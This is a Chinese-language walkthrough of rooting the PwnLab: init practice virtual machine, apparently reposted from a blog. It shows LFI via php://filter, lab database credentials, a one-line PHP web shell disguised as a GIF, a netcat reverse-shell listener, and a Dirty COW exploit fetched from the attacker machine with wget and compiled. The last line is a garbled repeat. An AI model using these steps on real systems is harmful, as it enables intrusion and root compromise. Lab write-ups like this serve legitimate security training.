其他分享
首页 > 其他分享> > OSCP pwnlab_init 靶机渗透

OSCP pwnlab_init 靶机渗透

作者:互联网

pwnlab_init 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-04-07

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

netdiscover -i eth0   pwnlab_init主机ip为172.16.1.20

nmap -A -p- 172.16.1.20

我们看到开启了80、3306等端口,登录80端口看看

二、web渗透

查看了源代码,没什么发现,upload提示需要登录才能上传,尝试sqlmap注入,没有注入漏洞,尝试burpsuite爆破无效果。查询了相关资料了解了php伪协议

https://github.com/SewellDinG/LFIboomCTF

使用php://filter 访问login

http://172.16.1.20/index.php?page=php://filter/read=convert.base64-encode/resource=login

使用burpsuite进行base64解密,解密后得到源码

发现require函数,继续相同方法解密

http://172.16.1.20/index.php?page=php://filter/read=convert.base64-encode/resource=config

解密后得到信息,用户名root 密码:H4u%QJ_H99 数据库名Users

远程连接mysql

mysql -h 172.16.1.20 -uroot -pH4u%QJ_H99

成功登录mysql 切换数据库

use Users

查询用户表

select * from users;

得到三个用户,选取其中一个尝试登录(密码为base64加密后的,需解密)

用户名kent 密码JWzXuBJJNy

成功登录,尝试上传木马反弹shell

创建php木马

<?php echo shell_exec($_GET["cmd"]); ?>
保存为pwn.php

提示只能传图片文件,那我们就把php变成gif,并在文件头增加GIF任意数字来绕过监测

mv pwn.php pwn.gif

然后再尝试上传,成功上传,查看源码得到木马地址

尝试找到调用方法,查看index.php

http://172.16.1.20/index.php?page=php://filter/read=convert.base64-encode/resource=index

发现lang可以调用

我们采用buipsuite进行拦截index.php,准备python反弹shell

同时本地开启监听

nc -nvlp 4444

成功反弹shell

三、提权

切换为交互式shell

 python -c 'import pty;pty.spawn("/bin/sh")'

切换后不知道为啥会重复打字

切换到kent用户

su kent 输入密码后登陆

查询系统版本看看是否有提权漏洞

存在dirtycow linux提权漏洞

漏洞链接https://raw.githubusercontent.com/exrienz/DirtyCow/master/dc32.c

下载到本地。并移动到var/www/html

开启本地apache服务

service apache2 start

受害机切换到tmp目录

wget http://172.16.1.4/dirtycow.c

进行gcc编译

gcc dirtycow.c -o cow -pthread

赋予执行权限并执行

chmod +x cow

./cow

成功得到root权限

echo 0 > /proc/sys/vm/dirty_writeback_centisecsecho 0 > /proc/sys/vm/dirty_writeback_centisecs

 

标签:index,1.20,pwnlab,base64,解密,init,172.16,php,OSCP
来源: https://blog.csdn.net/qq_34935231/article/details/115492637